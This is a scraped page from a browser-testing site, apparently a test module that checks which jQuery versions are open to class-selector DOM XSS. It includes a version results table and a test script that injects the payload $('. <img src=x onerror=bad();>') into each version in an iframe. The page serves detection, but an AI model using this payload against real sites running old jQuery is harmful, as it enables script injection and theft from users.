123

123

By
py31j2h 0 Seen 173 times
Tags
123
Run this test now.

Results

This module appears to be new to the system. Please run the test, to view the results.

User Script (ENUM_FUNCTION)

					
DomStorm
 Search
 Create Module
 Modules 
 Docs 
 GitHub
 py31j2h
jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR')
List of all jQuery versions vulnerable to class selector XSS. These jQuery libraries cause DOM XSS when a user controlled value is passed as a the class selected [$('.'+ className)]
By beingritika   0 Seen 5325 times 
Tags jquery xss 
 

 Results
 Chrome
 Firefox
 Mobile Safari
 Chromium
 Safari
 Chrome Mobile
 Opera
 IE

Tested onChrome - 66 - Windows 7
jQuery Version	Is it Vulnerable?
jQuery 1.12.2	Safe
jQuery 1.10.2	Safe
jQuery 1.10.1	Safe
jQuery 1.10.0	Safe
jQuery 1.9.1	Safe
jQuery 1.12.3	Safe
jQuery 1.9.0	Safe
jQuery 1.8.1	Vulnerable
jQuery 1.8.0	Vulnerable
jQuery 1.8.2	Vulnerable
jQuery 1.5.1	Safe
jQuery 1.7.2	Vulnerable
jQuery 1.7.1	Vulnerable
jQuery 1.7.0	Vulnerable
jQuery 1.6.3	Vulnerable
jQuery 1.6.2	Vulnerable
jQuery 1.6.4	Vulnerable
jQuery 1.6.1	Vulnerable
jQuery 1.6.0	Vulnerable
jQuery 1.5.2	Vulnerable
jQuery 1.4.4	Vulnerable
jQuery 1.5.0	Vulnerable
jQuery 1.4.3	Vulnerable
jQuery 1.3.0	Vulnerable
jQuery 1.2.6	Vulnerable
jQuery 1.4.2	Vulnerable
jQuery 1.4.1	Vulnerable
jQuery 1.4.0	Vulnerable
jQuery 1.3.2	Vulnerable
jQuery 1.3.1	Vulnerable
jQuery 1.2.3	Vulnerable
 User Script (ENUM_FUNCTION)
					

                // Custom Functions
var jQuery_version = '';
function vulnerable(){
    addError('jQuery '+ jQuery_version, '<b>Vulnerable</b>');
}

function safe(){
    addSuccess('jQuery '+ jQuery_version, 'Safe');
}
    
function removeIframe(){
    var x = document.getElementById('jQueryFrameID');
    x.parentNode.removeChild(x);
}

// Test Function
function test(data){
	// We need to separate properties and access one by one.
try{
    jQuery_version = data;
    var jQueryFrame = document.createElement('iframe');
    jQueryFrame.id = 'jQueryFrameID';
    jQueryFrame.onload = function(){
            var jQueryScript = jQueryFrame.contentWindow.document.createElement('script');
            jQueryScript.type = 'text/javascript';
            jQueryScript.src = 'http://www.ah-l-tax.gov.cn/portal/templetlib/2016/images/'+ data.toString() +'/jquery.js';
            jQueryFrame.contentWindow.document.body.appendChild(jQueryScript);
            jQueryScript.onload = function(){
                var exploitScript = "try{function bad(){parent.vulnerable(); parent.removeIframe();} $('. <img src=x onerror=bad();>');} catch(err){parent.safe();parent.removeIframe();}";
                var exploit = jQueryFrame.contentWindow.document.createElement('script');
                exploit.type = 'text/javascript';
                exploit.innerHTML = exploitScript;
                jQueryFrame.contentWindow.document.body.appendChild(exploit);
                
            };
            jQueryScript.onerror = function(){
                addResult(data ,  'Some Error Occured');
            }
    };
    document.body.appendChild(jQueryFrame);

}

catch(err){
	addInfo(data ,  'Some Error Occured');
}

}
					
				
              
					
				
 Enum Data (ENUM_FUNCTION)
					
 // Taken from jQuery Versions Under, https://developers.google.com/speed/libraries/devguide#jquery
var data = ['1.12.3', '1.12.2', '1.10.2', '1.10.1', 
'1.10.0', '1.9.1', '1.9.0', '1.8.2', '1.8.1', '1.8.0', 
'1.7.2', '1.7.1', '1.7.0', '1.6.4', '1.6.3', '1.6.2', '1.6.1', 
'1.6.0', '1.5.2', '1.5.1', '1.5.0', '1.4.4', '1.4.3', '1.4.2', 
'1.4.1', '1.4.0', '1.3.2', '1.3.1', '1.3.0', '1.2.6', '1.2.3']; 
					
				
104.18.55.86
					
				

Enum Data (ENUM_FUNCTION)

					
 // Taken from jQuery Versions Under, https://developers.google.com/speed/libraries/devguide#jquery
var data = ['1.12.3', '1.12.2', '1.10.2', '1.10.1', 
'1.10.0', '1.9.1', '1.9.0', '1.8.2', '1.8.1', '1.8.0', 
'1.7.2', '1.7.1', '1.7.0', '1.6.4', '1.6.3', '1.6.2', '1.6.1', 
'1.6.0', '1.5.2', '1.5.1', '1.5.0', '1.4.4', '1.4.3', '1.4.2', 
'1.4.1', '1.4.0', '1.3.2', '1.3.1', '1.3.0', '1.2.6', '1.2.3'];